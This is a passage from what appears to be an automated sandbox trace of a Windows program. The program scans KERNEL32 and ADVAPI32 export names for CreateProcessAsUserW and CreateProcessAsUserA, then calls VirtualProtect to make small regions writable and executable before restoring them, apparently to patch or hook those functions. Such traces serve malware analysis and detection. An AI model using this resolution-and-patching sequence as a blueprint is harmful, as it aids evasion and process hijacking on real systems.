lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseQueryModuleData", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseReadAppCompatDataForProcessWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseSetLastNTError", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseThreadInitThunk", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseUpdateAppcompatCache", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseUpdateAppcompatCacheWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseUpdateVDMEntry", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseVerifyUnicodeString", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BaseWriteErrorElevationRequiredEvent", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="Basep8BitStringToDynamicUnicodeString", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepAllocateActivationContextActivationBlock", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepAnsiStringToDynamicUnicodeString", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepAppContainerEnvironmentExtension", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepAppXExtension", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepCheckAppCompat", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepCheckWebBladeHashes", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepCheckWinSaferRestrictions", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepConstructSxsCreateProcessMessage", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepCopyEncryption", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepFreeActivationContextActivationBlock", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepFreeAppCompatData", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepGetAppCompatData", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepGetComputerNameFromNtPath", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepGetExeArchType", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepIsProcessAllowed", lpString2="CreateProcessAsUserW") returned -1 [0208.877] lstrcmpA (lpString1="BasepMapModuleHandle", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BasepNotifyLoadStringResource", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BasepPostSuccessAppXExtension", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BasepProcessInvalidImage", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BasepQueryAppCompat", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BasepReleaseAppXContext", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BasepReleaseSxsCreateProcessUtilityStruct", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BasepReportFault", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BasepSetFileEncryptionCompression", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="Beep", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BeginUpdateResourceA", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BeginUpdateResourceW", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BindIoCompletionCallback", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BuildCommDCBA", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsA", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsW", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="BuildCommDCBW", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CallNamedPipeA", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CallNamedPipeW", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CallbackMayRunLong", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CalloutOnFiberStack", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CancelDeviceWakeupRequest", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CancelIo", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CancelIoEx", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CancelSynchronousIo", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CancelThreadpoolIo", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CancelTimerQueueTimer", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CancelWaitableTimer", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CeipIsOptedIn", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="ChangeTimerQueueTimer", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CheckAllowDecryptedRemoteDestinationPolicy", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CheckElevation", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CheckElevationEnabled", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CheckForReadOnlyResource", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CheckForReadOnlyResourceFilter", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3A", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3W", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CheckRemoteDebuggerPresent", lpString2="CreateProcessAsUserW") returned -1 [0208.878] lstrcmpA (lpString1="CheckTokenCapability", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CheckTokenMembershipEx", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ClearCommBreak", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ClearCommError", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseConsoleHandle", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseHandle", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ClosePackageInfo", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ClosePrivateNamespace", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseProfileUserMapping", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseState", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseThreadpool", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseThreadpoolCleanupGroup", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseThreadpoolCleanupGroupMembers", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseThreadpoolIo", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseThreadpoolTimer", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseThreadpoolWait", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CloseThreadpoolWork", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CmdBatNotification", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CommConfigDialogA", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CommConfigDialogW", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CompareCalendarDates", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CompareFileTime", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CompareStringA", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CompareStringEx", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CompareStringOrdinal", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CompareStringW", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ConnectNamedPipe", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ConsoleMenuControl", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ContinueDebugEvent", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ConvertCalDateTimeToSystemTime", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ConvertDefaultLocale", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ConvertFiberToThread", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ConvertSystemTimeToCalDateTime", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ConvertThreadToFiber", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="ConvertThreadToFiberEx", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CopyContext", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CopyFile2", lpString2="CreateProcessAsUserW") returned -1 [0208.879] lstrcmpA (lpString1="CopyFileA", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CopyFileExA", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CopyFileExW", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CopyFileTransactedA", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CopyFileTransactedW", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CopyFileW", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CopyLZFile", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateActCtxA", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateActCtxW", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateActCtxWWorker", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateBoundaryDescriptorA", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateBoundaryDescriptorW", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateConsoleScreenBuffer", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateDirectoryA", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateDirectoryExA", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateDirectoryExW", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateDirectoryTransactedA", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateDirectoryTransactedW", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateDirectoryW", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateEventA", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateEventExA", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateEventExW", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateEventW", lpString2="CreateProcessAsUserW") returned -1 [0208.880] lstrcmpA (lpString1="CreateFiber", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFiberEx", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFile2", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFileA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFileMappingA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFileMappingFromApp", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFileMappingNumaA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFileMappingNumaW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFileMappingW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFileTransactedA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFileTransactedW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateFileW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateHardLinkA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateHardLinkTransactedA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateHardLinkTransactedW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateHardLinkW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateIoCompletionPort", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateJobObjectA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateJobObjectW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateJobSet", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateMailslotA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateMailslotW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateMemoryResourceNotification", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateMutexA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateMutexExA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateMutexExW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateMutexW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateNamedPipeA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateNamedPipeW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreatePipe", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreatePrivateNamespaceA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreatePrivateNamespaceW", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateProcessA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="CreateProcessAsUserW") returned -1 [0208.881] lstrcmpA (lpString1="CreateProcessAsUserW", lpString2="CreateProcessAsUserW") returned 0 [0208.881] VirtualProtect (in: lpAddress=0x7ff977b3b774, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x235f508 | out: lpflOldProtect=0x235f508*=0x2) returned 1 [0208.882] VirtualProtect (in: lpAddress=0x7ff977b23a1c, dwSize=0xe, flNewProtect=0x40, lpflOldProtect=0x235f500 | out: lpflOldProtect=0x235f500*=0x20) returned 1 [0208.883] VirtualProtect (in: lpAddress=0x7ff977b23a1c, dwSize=0xe, flNewProtect=0x20, lpflOldProtect=0x235f500 | out: lpflOldProtect=0x235f500*=0x40) returned 1 [0208.883] VirtualProtect (in: lpAddress=0x7ff977b3b774, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x235f508 | out: lpflOldProtect=0x235f508*=0x40) returned 1 [0208.883] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4a0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4a0, ReturnLength=0x0) returned 0x0 [0208.883] GetModuleHandleA (lpModuleName="ADVAPI32.DLL") returned 0x7ff976f80000 [0208.883] lstrcmpA (lpString1="A_SHAFinal", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="A_SHAInit", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="A_SHAUpdate", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="AccessCheck", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="AccessCheckByType", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="CreateProcessAsUserA") returned -1 [0208.883] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddAce", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddAuditAccessAce", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddAuditAccessAceEx", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddAuditAccessObjectAce", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddConditionalAce", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddMandatoryAce", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddUsersToEncryptedFile", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AddUsersToEncryptedFileEx", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AdjustTokenGroups", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AdjustTokenPrivileges", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AllocateAndInitializeSid", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AllocateLocallyUniqueId", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AreAllAccessesGranted", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AreAnyAccessesGranted", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditComputeEffectivePolicyBySid", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditComputeEffectivePolicyByToken", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditEnumerateCategories", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditEnumeratePerUserPolicy", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditEnumerateSubCategories", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditFree", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditLookupCategoryGuidFromCategoryId", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditLookupCategoryIdFromCategoryGuid", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditLookupCategoryNameA", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditLookupCategoryNameW", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditLookupSubCategoryNameA", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditLookupSubCategoryNameW", lpString2="CreateProcessAsUserA") returned -1 [0208.884] lstrcmpA (lpString1="AuditQueryGlobalSaclA", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="AuditQueryGlobalSaclW", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="AuditQueryPerUserPolicy", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="AuditQuerySecurity", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="AuditQuerySystemPolicy", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="AuditSetGlobalSaclA", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="AuditSetGlobalSaclW", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="AuditSetPerUserPolicy", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="AuditSetSecurity", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="AuditSetSystemPolicy", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BackupEventLogA", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BackupEventLogW", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegCloseKey", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegCreateKey", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegDeleteKeyEx", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegDeleteValue", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegFlushKey", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegGetVersion", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegLoadKey", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegOpenKey", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegRestoreKey", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegSaveKeyEx", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegSetKeySecurity", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegSetValue", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BaseRegUnLoadKey", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildExplicitAccessWithNameA", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildExplicitAccessWithNameW", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildImpersonateExplicitAccessWithNameA", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildImpersonateExplicitAccessWithNameW", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildImpersonateTrusteeA", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildImpersonateTrusteeW", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildSecurityDescriptorA", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildSecurityDescriptorW", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildTrusteeWithNameA", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildTrusteeWithNameW", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndNameA", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndNameW", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndSidA", lpString2="CreateProcessAsUserA") returned -1 [0208.885] lstrcmpA (lpString1="BuildTrusteeWithObjectsAndSidW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="BuildTrusteeWithSidA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="BuildTrusteeWithSidW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="CancelOverlappedAccess", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ChangeServiceConfig2A", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ChangeServiceConfig2W", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ChangeServiceConfigA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ChangeServiceConfigW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="CheckForHiberboot", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="CheckTokenMembership", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ClearEventLogA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ClearEventLogW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="CloseCodeAuthzLevel", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="CloseEncryptedFileRaw", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="CloseEventLog", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="CloseServiceHandle", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="CloseThreadWaitChainSession", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="CloseTrace", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="CommandLineFromMsiDescriptor", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ComputeAccessTokenFromCodeAuthzLevel", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ControlService", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ControlServiceExA", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA (lpString1="ControlServiceExW", lpString2="CreateProcessAsUserA") returned -1 [0208.886] lstrcmpA 